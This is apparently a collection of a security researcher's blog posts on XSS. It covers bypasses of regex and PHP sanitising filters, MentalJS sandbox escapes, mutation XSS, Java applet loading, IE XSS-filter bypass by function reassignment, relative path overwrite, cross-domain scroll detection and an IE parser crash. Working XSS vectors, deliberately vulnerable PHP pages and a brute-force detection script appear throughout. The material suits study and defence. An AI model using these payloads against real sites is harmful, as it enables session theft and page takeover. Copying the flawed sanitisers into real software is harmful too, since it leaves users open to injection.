Unbreakable filter

I was bored so I thought I’d take a look at Ashar’s filters. I noticed he’d done a talk about them at Blackhat Europe, which quite surprised me. Then I came across the following blog post about the talk, which I pretty much agreed with. That blog post links to his filters so you can try them out yourself.

The first one is basically multiple JavaScript regexes which are far too generic to be of any value. For example “hahasrchaha” is considered a valid attack =) because it has “src” in it. I’m not joking. The regexes are below.


function test(string) {
    var match = /]*>[\s\S]*?/i.test(string) ||
        /[\s"\'`;\/0-9\=\x0B\x09\x0C\x3B\x2C\x28]+on\w+[\s\x0B\x09\x0C\x3B\x2C\x28]*=/i.test(string) ||
        /(?:=|U\s*R\s*L\s*\()\s*[^>]*\s*S\s*C\s*R\s*I\s*P\s*T\s*:/i.test(string) ||
        /%[\d\w]{2}/i.test(string) ||
        /&#[^&]{2}/i.test(string) ||
        /&#x[^&]{3}/i.test(string) ||
        /:/i.test(string) ||
        /[\s\S]src[\s\S]/i.test(string) ||
        /[\s\S]data:text\/html[\s\S]/i.test(string) ||
        /[\s\S]xlink:href[\s\S]/i.test(string) ||
        /[\s\S]base64[\s\S]/i.test(string) ||
        /[\s\S]xmlns[\s\S]/i.test(string) ||
        /[\s\S]xhtml[\s\S]/i.test(string) ||
        /[\s\S]href[\s\S]/i.test(string) ||
        /[\s\S]style[\s\S]/i.test(string) ||
        /[\s\S]formaction[\s\S]/i.test(string) ||
        /[\s\S]@import[\s\S]/i.test(string) ||
        /[\s\S]!ENTITY.*?SYSTEM[\s\S]/i.test(string) ||
        /[\s\S]pattern(?=.*?=)[\s\S]/i.test(string) ||
        /]*>[\s\S]*?/i.test(string) ||
        /]*>[\s\S]*?/i.test(string) ||
        /]*>[\s\S]*?/i.test(string) ||
        /]*>[\s\S]*?/i.test(string) ||
        /]*>[\s\S]*?/i.test(string) ||
        /]*>?[\s\S]*?/i.test(string) ||
        /]*>?[\s\S]*?/i.test(string);
    return match ? 'Filter has catch your awesome vector ... Try hard :(' : 'Bypass :)';
}
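
To see how loose the keyword rules are, here is a small sketch that runs two of them, copied verbatim from the function above, against harmless strings. The helper name and the sample strings other than “hahasrchaha” are made up for illustration.

```javascript
// Two keyword rules copied verbatim from the filter above.
const keywordRules = [
  /[\s\S]src[\s\S]/i,
  /[\s\S]style[\s\S]/i,
];

// Returns true when any rule fires, i.e. the filter would call the input an attack.
// (flaggedAsAttack is a hypothetical helper, not part of the original filter.)
function flaggedAsAttack(input) {
  return keywordRules.some((rule) => rule.test(input));
}

const harmlessSamples = ['hahasrchaha', 'my lifestyle blog', 'plain text'];
for (const sample of harmlessSamples) {
  console.log(JSON.stringify(sample), flaggedAsAttack(sample));
}
// "hahasrchaha" true
// "my lifestyle blog" true
// "plain text" false
```

Any text that happens to contain one of the keywords with a character on either side is reported as an attack, which is why the rules have no practical value.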

Because the filter is so bad it makes it fun to find a vector. The following vector will bypass the rule:


<button form=x>xss<form id=x action="javas&Tab;cript:alert(1)"

Other examples are:-

@\import
javas&NewLine;cript:alert(1)

Ashar also claimed his new filter was "unbreakable". There wasn't a lot of code but it was still badly broken. Let's take a look at that code:

function attributeContextCleaner($input) {
    $bad_chars = array("\"", "'", "``");
    $safe_chars = array("&quot;", "&apos;", "&grave;");
    $output = str_replace($bad_chars, $safe_chars, $input);
    return stripslashes($output);
}

Can you see it? He uses "``" instead of "`", so the code looks for two backticks rather than one, but that is not all. He also uses stripslashes for some random reason, and we can use that to bypass the XSS filter in IE. Not only does this code contain the very hole it's supposed to protect against, it also enables the XSS vector to function.
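
The backtick mistake can be reproduced with a rough JavaScript model of the str_replace call. This is only a sketch: `replaceBadChars` is a hypothetical stand-in for the PHP function, the pairs are applied in order as PHP does with array arguments, and stripslashes is deliberately left out.

```javascript
// Rough JavaScript model of the str_replace() step in attributeContextCleaner.
// Each search/replace pair is applied in order; stripslashes() is NOT modelled.
function replaceBadChars(input) {
  const pairs = [
    ['"', '&quot;'],
    ["'", '&apos;'],
    ['``', '&grave;'], // the bug: this searches for two backticks, not one
  ];
  return pairs.reduce(
    (output, [bad, safe]) => output.split(bad).join(safe),
    input
  );
}

console.log(replaceBadChars('`src=1 onerror=`alert(1)`')); // `src=1 onerror=`alert(1)`
console.log(replaceBadChars('``'));                        // &grave;
console.log(replaceBadChars('"\''));                       // &quot;&apos;
```

A single backtick passes through untouched, so an attribute delimited by backticks can be closed by the attacker.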


<?php
function attributeContextCleaner($input) {
    $bad_chars = array("\"", "'", "``");
    $safe_chars = array("&quot;", "&apos;", "&grave;");
    $output = str_replace($bad_chars, $safe_chars, $input);
    return stripslashes($output);
}
?>
<img title=`<?php echo attributeContextCleaner($_GET['x'])?>` />

The vector to bypass the function and the XSS filter is:-

?x=`src=1 \0\0\0\0onerror=`alert(1)`

Stripslashes in PHP kindly removes all \0 for us which enables us to bypass the filter. This obviously only works in compat mode where "`" is an allowed attribute quote. In conclusion I don't recommend using any of the filters. Try mario's instead.

MentalJS bypasses

I managed to find time to fix a couple of MentalJS bypasses by LeverOne and Soroush Dalili (@irsdl). LeverOne’s vector was outstanding since it bypassed the parsing itself which is no easy task. The vector was as follows:


for(var i
i/'/+alert(location);0)break//')

Basically my parser was inserting a semicolon in the wrong place, causing a different state than the actual state executed. My fix inserts the semicolon in the correct place. Before the fix the rewritten code looked like this:


for (var i$i$; / '/+alert(location);0)break//')

As you can see the variables have been incorrectly joined and so the next state is a regex whereas Mental thinks it’s a divide. After the fix the rewritten code looks like this:


for (var i$;i$ / '/+alert(location);0)break//')

So now the divide is an actual divide. Technically I shouldn’t be inserting a semicolon in the for statement; I might fix this at a later stage if I have time.
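
The underlying ambiguity is easy to reproduce outside MentalJS. In the sketch below (the variable names and values are made up, and this is not the MentalJS parser), the two snippets differ only by a semicolon, yet the same `/2/g` characters are read as two divisions in one and as a regex literal in the other. Indirect eval is used only to get at the value of the last statement.

```javascript
// Indirect eval returns the completion value of the last statement in the snippet.
const run = (source) => (0, eval)(source);

// After an identifier, "/" is the division operator: (8 / 2) / 2.
const asDivide = run('var i = 8, g = 2; i /2/g');

// After a semicolon a new statement starts, so "/2/g" is a regex literal with the g flag.
const asRegex = run('var i = 8, g = 2; i; /2/g');

console.log(asDivide);                  // 2
console.log(asRegex instanceof RegExp); // true
```

A rewriter that puts the semicolon in the wrong place therefore disagrees with the browser about whether the next slash starts a regex, which is exactly the state confusion the vector relied on.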

The second bypass was from Soroush that basically assigned innerHTML on script nodes bypassing the rewriting completely. Cool bug. The fix was pretty simple, I prevented innerHTML assignments on script nodes. Here is the bypass:-


parent=document.getElementsByTagName('body')[0];
img=document.getElementsByTagName('img')[0];
x=document.createElement('script');
x.innerHTML='alert(location)';
parent.appendChild(x);

mXSS

Mutation XSS was coined by me and Mario Heiderich to describe an XSS vector that is mutated from a safe state into an unsafe unfiltered state. The most common form of mXSS is from incorrect reads of innerHTML. A good example of mXSS was discovered by Mario where the listing element mutated its contents to execute XSS.

<listing>&lt;img src=1 onerror=alert(1)&gt;</listing>

When the listing’s innerHTML is read it is transformed into an image element even though the initial HTML is escaped. The following code example shows how the entities are decoded.

<listing id=x>&lt;img src=1 onerror=alert(1)&gt;</listing>
<script>alert(document.getElementById('x').innerHTML)</script>

The expected result of the alert would be “&lt;img src=1 onerror=alert(1)&gt;”, however IE10 decodes the entities and returns “<img src=1 onerror=alert(1)>” instead. The vector mutated from a safe state to an unexpected unsafe state. mXSS can work on multiple reads of the data: the first render is the actual HTML and every read of innerHTML counts as another mutation, since it could be decoded multiple times.

To help test for mutation vectors I’ve created a simple tool that mutates the HTML over multiple levels. It does this by repeatedly reading and writing the HTML. The tool is available here:

mXSS tool

If you try the above vector using this tool you can see how the vector mutates and executes. Because mutation XSS works on multiple levels the following HTML will be perfectly valid if you change the mutation level to 2. This reads and writes the HTML twice, you can of course increase the mutation value and continue encoding forever.

<listing>&amp;lt;img src=1 onerror=alert(1)&gt;</listing>
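
The idea of mutation levels can be sketched with a toy model in which each read/write cycle wrongly decodes one layer of entities. This is not how IE's parser is implemented; `decodeOnce` and `mutate` are hypothetical helpers that only handle a handful of named entities.

```javascript
// Toy model of one innerHTML read/write cycle that wrongly decodes entities.
// Only a few named entities are handled; real parsers do far more.
const ENTITIES = { amp: '&', lt: '<', gt: '>', quot: '"' };

function decodeOnce(text) {
  return text.replace(/&(amp|lt|gt|quot);/g, (match, name) => ENTITIES[name]);
}

// Apply the decode step `levels` times, like raising the mutation level.
function mutate(text, levels) {
  let current = text;
  for (let i = 0; i < levels; i++) {
    current = decodeOnce(current);
  }
  return current;
}

const payload = '&amp;lt;img src=1 onerror=alert(1)&gt;';
console.log(mutate(payload, 1)); // &lt;img src=1 onerror=alert(1)>
console.log(mutate(payload, 2)); // <img src=1 onerror=alert(1)>
```

After one level the payload is still escaped; only the second level produces a live tag, which is why a filter that checks a single read can miss it.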

HTML parsers often get confused, understandably, because of the complex interaction between HTML, entities and different document types. One of those confusions happens with HTML and XHTML. In IE9 document mode the entities will be decoded by confusing the parser into thinking it’s an XHTML element rather than an HTML element. Visit the mXSS tool in IE9 mode at the following URL

mXSS tool in IE9 mode

By using a forward slash, which is ignored in HTML but treated as self-closing in XHTML, we confuse the HTML parser into rendering the entities, breaking out of the style element and executing an image element. This bug was fixed in IE10 but thanks to the useful backwards compatibility modes we can render using IE9 and still execute.

<style/>&lt;/style&gt;&lt;img src=1 onerror=alert(1)&gt;</style>

More elements work this way in IE9, the following Shazzer URL shows which elements decode entities in this way.

Incorrect innerHTML serialization

Another cool IE9 mutation vector is using the “<%” element, this element acts as a comment and it’s possible to mutate attributes inside other elements combining a script based vector. An example is below.


<script>
x="<%";
</script>
<div title="%&gt;&lt;/script&gt;&quot;&lt;img src=1 onerror=alert(1)&gt;"></div>

Java Serialization

In this post I will explore Java serialized applets and how they can be used for XSS. A serialized applet contains code that can be easily stored and loaded. Java supports an attribute called “object” which accepts a URL to a serialized class file. This allows us to load applets of our choosing, provided they can be serialized and implement the java.io.Serializable interface. This feature is very old and obscure, and I have successfully used the technique to bypass filters that look for very specific XSS patterns.

In order to create a serializable Java applet you need the following code (You also need to add plugin.jar to the class path):

import java.applet.*;
import netscape.javascript.*;

public class XSS extends Applet implements java.io.Serializable {
    public void init() {
        JSObject win = (JSObject) JSObject.getWindow(this);
        win.eval("alert(1);");
    }
}

plugin.jar has to be on your class path when compiling because it provides the netscape.javascript classes that let the applet call eval in the page. When you have successfully compiled and serialized the applet you can call it using the object attribute like so.

<applet object="xss.ser" codebase="http://any url here containing the class and serialized data"></applet>

Use codebase to give the path to the serialized object and object to point to the filename. This isn’t the only method to include a serialized applet. The Java plugin in IE supports many ways to point to a serialized file. I can also use param elements to specify the object reference like the following:

<applet><param name=codebase value=http://someurl><param name=object value=xss.ser></applet>

Unbelievably the plugin supports a “java_” prefix in all attribute names. So the following is a valid request to a serialized file.

<applet java_codebase=http://someurl java_object=xss.ser></applet>

You can even use param elements to do the same thing. Like the following

<applet><param name=java_codebase value=http://someurl><param name=java_object value=xss.ser></applet>

Finally away from serialization there is another trick to embed a class file using the embed element.

<embed type=application/x-java-applet codebase=http://someurl code=xss.class MAYSCRIPT width=500 height=500></embed>

This also works with Flash and you don’t even need to specify the type attribute, just the code attribute. This works on WebKit.

<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>

Bypassing the XSS filter using function reassignment

The XSS filter introduced in IE8 is a really powerful defence against XSS. I tested the filter for a number of years and found various bypasses one of which I would like to share with you now. You can read more about the filter and its goal in the following blog post.

Scope

There have been numerous public bypasses of the filter however very few within the intended scope of the filter. The filter blocks reflected XSS in HTML context, script, style and event context. It does not support attacks that use multiple parameters or same origin requests. Once you are aware of the intended scope the difficulty of bypassing the filter is very high.

Function reassignment

This bypass was fixed in later versions of Internet Explorer but still works in compatibility mode. You can use the vector in a penetration test by forcing the target site into compatibility mode using an iframe with an EmulateIE7 meta element as shown below.

<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />

This loads IE in emulate mode and the entire JavaScript engine will revert to an older mode, enabling the vector to function. We need to set up a page with the target input inside a function argument in order to demonstrate the bypass. As you can see below, the parameter “x” appears inside a string argument in the call to the function “x”.


<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<script>
function x() {

}
<?php
$x = isset($_GET['x']) ? $_GET['x'] : '';
?>
x('<?php echo $x?>');
</script>

In older versions of Internet Explorer it’s possible to redefine a function within its calling arguments. This is very useful for bypassing the filter when your XSS hole executes within a function argument. To see how this works we pass a GET request to “x” within a payload that redefines the function “x” to alert and uses an argument before our break out string to pass to the function. The GET request looks like this:
somepage.php?x=1',x=alert,'

The output of the page now looks like this:

<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<script>
function x() {

}
x('1',x=alert,'');
</script>

“1” is inserted at the start of the argument then we break out of the string and redefine the function “x” to alert then finish up by completing the string. The alert function only accepts 1 argument so our other arguments are ignored and alert(1) executes successfully.
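
For contrast, here is what a standards-compliant engine does with the same call shape. In this sketch the `replacement` function and the `calls` array are stand-ins for alert so it can run in Node or a modern browser. The callee is looked up before the arguments are evaluated, so the reassignment only affects later calls, which is why the vector needs the older engine.

```javascript
const calls = [];

function x() {
  calls.push('original x');
}

// Stand-in for alert so the result can be inspected.
function replacement(arg) {
  calls.push('replacement called with ' + arg);
}

// Same shape as the injected call: x is reassigned inside its own argument list.
x('1', x = replacement, '');

// The callee was resolved before the arguments were evaluated,
// so the original x ran above; only this later call sees the new value.
x('2');

console.log(calls); // [ 'original x', 'replacement called with 2' ]
```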

Conclusion

As mentioned previously this vector was patched in later versions of IE, however it will still work where a target site is in compatibility mode or you can force it into the older mode using iframes. The newer JavaScript engines in IE will not allow you to redefine functions within arguments. To protect against this vector you can force your site into standards mode by specifying a doctype or using the X-UA-Compatible header or meta element in edge mode. Preventing your site from being framed using the X-Frame-Options header is also a good idea, and of course fixing the actual XSS hole in the first place is preferred.

RPO

Relative VS Absolute

RPO (Relative Path Overwrite) is a technique to take advantage of relative URLs by overwriting their target file. To understand the technique we must first look into the differences between relative and absolute URLs. An absolute URL is basically the full URL for a destination address including the protocol and domain name whereas a relative URL doesn’t specify a domain or protocol and uses the existing destination to determine the protocol and domain.

Absolute URL

https://hackvertor.co.uk/public

Relative URL
public/somedirectory

The relative URL shown will look for public and automatically include the domain before it based on the current domain name. There are two important variations of a relative URL, the first is we can use the current path and look for a directory within it such as “xyz” or use common directory traversal techniques such as “../xyz”. To see how these work within markup let’s take a look at a common relative URL used within a stylesheet.


<html>
<head>
<link href="styles.css" rel="stylesheet" type="text/css" />
</head>
<body>
</body>
</html>

The link element above references “styles.css” using a relative URL, so the style sheet is loaded relative to wherever you are in the site’s directory structure. For example, if you were in a directory called “xyz” then the style sheet would be loaded from “xyz/styles.css”.

The interesting aspect of this is how the browser knows what a correct path is, since it doesn’t have access to the server’s file system. The answer is it doesn’t. There is no way to determine a valid directory structure from outside the file system; you can only make educated guesses and use HTTP status codes to determine whether a path exists.

The missing styles

I noticed something interesting with relative styles, manipulating the path of the site could result in styles failing to load. It occurred to me this was a flaw in some way but the pieces of the jigsaw didn’t make sense yet. How could it be exploited?

Normal site

Relative url manipulated

The two screenshots above show the same site. In the first the URL is not manipulated and the styles load as expected; in the second the site is loaded with an added forward slash and the relative style sheet does not load. Simply adding a forward slash at the end of the URL breaks the relative style sheet. Looking in Firebug we can see the style sheet wdn.css returns a 404 when we add the forward slash.

Relative urls returning 404

The screenshot shows the style sheet returning a 404 even though it loaded fine before the path was manipulated. If the style sheet returns a 404, maybe we can manipulate the relative URL further by changing the path. This is in essence what RPO is about: we try to change the relative URL to point at something we control. Although this post is about XSS, it’s worth noting that any relative URL can be manipulated this way and the technique isn’t restricted to XSS.

Quick CSS lesson

Since we are looking at manipulating a style sheet to something we control we must first understand CSS parsing in order to take advantage of it. There is an interesting piece of the CSS 2 specification that we are very interested in.
“In some cases, user agents must ignore part of an illegal style sheet. This specification defines ignore to mean that the user agent parses the illegal part (in order to find its beginning and end), but otherwise acts as if it had not been there.” CSS 2 specification.
Another piece of the jigsaw is added: CSS 2 ignores illegal syntax, which we can use by supplying a file that contains a mix of CSS and something else. If we can fool the CSS parser into ignoring the illegal syntax before our intended code, we can get it to load our code. CSS selectors offer the best way to do this, since an invalid selector is ignored along with all the illegal syntax before it.

Invalid code

}*{color:#ccc;}

There are two tricks to ignore illegal code both involve selectors, depending on the CSS parser a single } will work or {}. We shall look at IE compat since the parser is quite loose and supports CSS expressions. A CSS expression looks like the following:


*{
xss:expression(alert(1));
}

The first part is the universal selector “*” and the { opens the rule. A custom property xss is used, and the expression contains JavaScript that executes alert(1).

Self-referencing

If we can make the style sheet self-reference for the page it’s on then we can use the CSS parsing to ignore the HTML and execute our custom CSS in IE compat. When a site includes a style sheet like the following:


<link href="styles.css" rel="stylesheet" type="text/css" />

We simply need to include a forward slash at the end of the URL and the style sheet will end up (if rewriting is available) loading the original page via what the browser thinks is a directory but is in fact the current page, e.g. somepage.php/. Now that our style sheet is loading the web page, we need to supply it with some CSS to execute. We can do this with persistent data such as a first name or address; think of this as both a reflective attack and a persistent attack where the persistent data contains CSS code.

To understand this it’s better to show the actual structure of the page so you can see the vector itself. Imagine we have a web page with some data we control such as “first name”; the web page would look like the following.


<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<link href="styles.css" rel="stylesheet" type="text/css" />
</head>
<body>
Hello {}*{xss:expression(open(alert(1)))}
</body>
</html>

PoC (IE ONLY): RPO example

The meta element forces IE’s document mode into IE7 compat, which is required to execute expressions. Our persistent text {}*{xss:expression(open(alert(1)))} is included on the page; in a realistic scenario it would be a profile page or maybe a shared status update which is viewable by other users. We use “open” to prevent client-side DoS from repeated executions of alert. A simple request of “rpo.php/” makes the relative style sheet load the page itself as a style sheet. The actual request is “/labs/xss_horror_show/chapter7/rpo.php/styles.css”: the browser thinks there’s another directory but the request is actually sent to the document, and that in essence is how an RPO attack works.
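
The browser side of this can be checked with the standard URL API, which resolves a relative reference the same way the browser resolves the link element's href. In this sketch example.com is a placeholder host; the path is the one from the PoC.

```javascript
// The browser resolves the link's href against the current page URL, nothing more.
const href = 'styles.css';

// example.com is a placeholder host; the path is the one from the PoC.
const normal = new URL(href, 'http://example.com/labs/xss_horror_show/chapter7/rpo.php');
const manipulated = new URL(href, 'http://example.com/labs/xss_horror_show/chapter7/rpo.php/');

console.log(normal.pathname);      // /labs/xss_horror_show/chapter7/styles.css
console.log(manipulated.pathname); // /labs/xss_horror_show/chapter7/rpo.php/styles.css
```

With the trailing slash the browser treats rpo.php as a directory, so the style sheet request goes to the document itself.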

Further RPO attacks

You might wonder if the RPO attack is restricted to just relative URLs like “styles.css” the answer is no, it’s possible to attack URLs such as “../../styles.css” but in this case we need to provide levels of fake directories until the styles are loaded from the current document. “../” means look above the current directory; we need three levels of fake directories.


<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<link href="../../styles.css" rel="stylesheet" type="text/css" />
</head>
<body>
Hello {}*{xss:expression(open(alert(1)))}
</body>
</html>

PoC: RPO example 2

This time because the relative URL is looking for a directory twice above the current directory we make a request of “/labs/xss_horror_show/chapter7/rpo2.php/styles.css” this means that you could also target a file in a different directory but in this case we pointed it back to the original html file. Note we could have done just rpo2.php/// but I provided the text of fake directory for clarity.
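
The number of fake directories can be worked out with the same URL API. In this sketch example.com, fake1 and fake2 are placeholders; each “../” consumes one path level, so two fake directories plus the trailing slash (three slashes in total) bring the request back to the document.

```javascript
const href = '../../styles.css';

// example.com is a placeholder host; the path is the one from the PoC.
const page = 'http://example.com/labs/xss_horror_show/chapter7/rpo2.php';

// Named fake directories (fake1 and fake2 are made-up names).
const named = new URL(href, page + '/fake1/fake2/');

// The shorter form: empty path segments count as levels too.
const bare = new URL(href, page + '///');

console.log(named.pathname); // /labs/xss_horror_show/chapter7/rpo2.php/styles.css
console.log(bare.pathname);  // /labs/xss_horror_show/chapter7/rpo2.php/styles.css
```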
There are other variants such as using the @import command which is useful if length or characters are limited. Using the “}” to ignore the HTML again followed by an @import statement works perfectly fine on IE even though technically it’s invalid syntax to use an import statement in this way.
RPO isn’t restricted to IE; we can use the technique on other browsers, but JavaScript isn’t supported in CSS on Chrome, Firefox, Opera or Safari. Another restriction is that a doctype cannot be included on the target document, since this causes the CSS parsers on non-IE browsers to stop parsing the HTML file.


<html>
<head>
<link href="../../styles.css" rel="stylesheet" type="text/css" />
</head>
<body>
Hello {}*{color:#ccc;}
</body>
</html>

PoC: RPO example 3

The document above changes the colour of the text to grey and works on every browser. It works in the same way as the previous PoC but this time uses pure CSS and no expressions. If a doctype was included in the document it would fail on every browser except if IE was in compat mode.
RPO attacks work on any type of document, it’s possible to change the target of image files for example but because the image files look for specific strings at the start of the file and the end result is only an image it makes RPO attacks less useful in these circumstances.

Reflected RPO

If the URL is outputted on the page we can send the XSS vector via the path. The following PHP example shows the URL being outputted on the page.


<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<link href="styles.css" rel="stylesheet" type="text/css" />
</head>
<body>
Hello <?php echo $_SERVER['PHP_SELF']?>
</body>
</html>

There is a relative URL here and “echo $_SERVER['PHP_SELF']” outputs the current URL of the page requested. We can exploit this by providing some CSS as part of the path: the relative URL will be loaded with our injection in the path, and the CSS will then be read from the HTML. On some configurations PHP_SELF will truncate the path information; in this instance PATH_INFO can be used.

PoC: RPO example 4

Summary

I consider relative URLs harmful since you cannot rely on the browser to determine the correct directory, especially when they are used with so-called “pretty URLs”. Pretty much everyone who has used relative URLs will be open to this type of attack if the path information is outputted or there is some persistent data that an attacker can manipulate. I recommend that absolute URLs be used throughout a site, or relative URLs that begin with a forward slash, since this is the only type of relative URL that isn’t vulnerable to an RPO attack because it starts at the document root.

Update..

It’s worth noting that a relative root URL isn’t vulnerable to this sort of attack since the directory is taken from the highest point in the structure and, I think, can’t be influenced the way a normal relative URL can.
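
A quick check with the URL API supports this. In the sketch below the manipulated address is hypothetical (example.com and the fake directories are placeholders): the plain relative URL follows the fake path, while the root-relative and absolute forms ignore it.

```javascript
// A hypothetical manipulated address with fake directories appended.
const manipulatedPage = 'http://example.com/labs/rpo.php/fake1/fake2/';

const relative = new URL('styles.css', manipulatedPage);
const rootRelative = new URL('/styles.css', manipulatedPage);
const absolute = new URL('https://hackvertor.co.uk/public', manipulatedPage);

console.log(relative.pathname);     // /labs/rpo.php/fake1/fake2/styles.css
console.log(rootRelative.pathname); // /styles.css
console.log(absolute.href);         // https://hackvertor.co.uk/public
```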

Sandboxed jQuery

My new personal challenge was to get jQuery working correctly in a sandboxed environment, which proved to be really tricky. The first problem I encountered was that my fake DOM environment wasn’t returning the correct value for nodeType on the document element; this made jQuery assume another state and broke selectors. I ensured the DOM environment was correctly returning the node type and node name. Next, my environment wasn’t returning Array.prototype.push and slice correctly: the functions I created were incorrectly returning false. I changed my object whitelist function to return the prototypes correctly.

I then got a strange error: push.apply is not writable. I traced this down in the jQuery code and it seems I was making properties non-writable when rewriting arrays. In addition, the length property wasn’t being written since it was referenced as length$ because it was sandboxed. The fix was to shadow the length property by creating a getter/setter on the rewritten object literals so that writes to length$ would also update the length of the object literal. Basically Sizzle calls push on an object, and because it didn’t have a length property it wouldn’t work, but now that it’s shadowed it works fine.
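
The shadowing idea can be sketched as follows. The actual MentalJS code isn’t reproduced here, so treat this as an illustration only; `shadowLength` is a hypothetical helper, and it assumes the sandbox rewrites `length` to `length$`.

```javascript
// Hypothetical helper: keep the sandboxed name length$ in sync with the real
// length property that native methods such as Array.prototype.push use.
function shadowLength(obj) {
  Object.defineProperty(obj, 'length$', {
    get() { return this.length; },
    set(value) { this.length = value; },
    enumerable: false,
    configurable: true,
  });
  return obj;
}

const arrayLike = shadowLength({ length: 0 });

// Native push reads and writes the real length property...
Array.prototype.push.call(arrayLike, 'a', 'b');
console.log(arrayLike.length$); // 2

// ...and sandboxed code writing length$ updates the real one.
arrayLike.length$ = 0;
console.log(arrayLike.length); // 0
```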

You can see a small demo of sandboxed jQuery here.

X-Domain scroll detection on IE using focus

This is a pretty cool bug. I use the focus event on an iframe to detect if the iframe has been scrolled x-domain. It works because IE fires the onfocus event of the iframe when the scroll occurs. This means that using 1 network request we can discover if a site contains a particular id, provided the page scrolls inside the iframe. Using multiple iframes you could quite easily bruteforce larger numbers or maybe a dictionary list of words, and because we are only changing the hash the later requests aren’t sent to the server.

First we need a page with an id we can scroll to.

<p>test</p>
<p>test</p>
<p>test</p>
<p>test</p>
<p>test</p>
<div id=1337>target</div>

When visiting this page it should jump to #1337 provided the window is small enough.

Next we create an iframe and attach an onfocus event:

<iframe src="http://hackvertor.co.uk/scroll/test.html" id="x" onfocus="alert('the iframe scrolled to: '+window.id);clearTimeout(timer)" name="x"></iframe>

Now we need to create the clicks to trigger the onfocus event and produce the scroll.


id=0;
var anchor = document.createElement('a');
anchor.target="x";
document.body.appendChild(anchor);

timer=setTimeout(function f(){
    id++;
    document.getElementById('pos').innerText = id;
    anchor.href='http://hackvertor.co.uk/scroll/test.html#'+id;
    anchor.click();
    if(id<10000) {
        timer=setTimeout(f,0);
    }
},0)

The code keeps calling itself until 10,000 iterations or until the onfocus event fires and clears the timeout. Which it does on IE with 1337 :)

PoC

Epic fail IE

gaz:
omg more epic fail in IE :D

larry:
huh? :D

gaz:
what is “&#x0000041;” in IE compat?

larry:
hm A?

gaz:
no

larry:
?

gaz:
lol
?

larry:
NUL
?

gaz:
&#x0000041; –> ?
&#x000041; –> A

larry:
ah!
out of bounds
I get it

gaz:
what is this in IE compat: &#x41

larry:
:-h
A?

gaz:
no
lol
&#x41 –> &#x41

larry:
#!$% me!
:D
why??

gaz:
hahahhaha
what is &#x41 in standards?

larry:
A
?

gaz:
yeah haha

larry:
weeee

gaz:
how messed up is that? :D

larry:
entirely
as usual
:)

new operator

I was playing around with new operators when I noticed something cool and unexpected. If you return a function the new operator will not create a new object instance but instead return a function. This means that stuff like:

new new new new new new function f(){return f}

Is perfectly valid code. That made me think maybe it would cause a crash. Yep, of course it does on IE:
eval(Array(0xffff).join('new ')+'function f(){return f}')

ModLoad: 00000000`70af0000 00000000`70ba5000 C:\Windows\SysWOW64\MsSpellCheckingFacility.dll
ModLoad: 00000000`69a40000 00000000`69a8f000 C:\Windows\SysWOW64\Bcp47Langs.dll
ModLoad: 00000000`74cd0000 00000000`74cd3000 C:\WINDOWS\SysWOW64\Normaliz.dll
(1778.173c): C++ EH exception – code e06d7363 (first chance)
(1778.173c): Stack overflow – code c00000fd (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
JSCRIPT9!Scanner::Scan+0x8:
70e69742 53 push ebx

Just a stack overflow. I don’t think it’s exploitable but let’s try and manipulate it further. Using unicode escapes changes the code slightly:

eval(Array(0xffff).join('\\u006e\u0065w ')+'function f(){return f}')

msvcrt!memcmp+0xc:
7506985c 56 push esi

I then thought about using different types of spaces and fuzzed them but had no success producing any form of exploitable crash, maybe you can?
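
The return-value rule behind the `new new new ...` chain can be checked safely with a shallow chain. In this sketch `Plain` is a made-up constructor added for comparison.

```javascript
// A constructor that returns a function: `new` hands back that function
// instead of a freshly created object, so the chain can keep going.
const result = new new new function f() { return f; };
console.log(typeof result, result.name); // function f

// For comparison, a constructor that returns a primitive: the return value
// is ignored and the new object is produced as usual.
function Plain() { return 1; }
console.log(typeof new Plain()); // object
```

Each `new` constructs `f`, gets `f` back, and passes it to the next `new`, so the depth of the chain is limited only by how the engine's parser copes with the nesting.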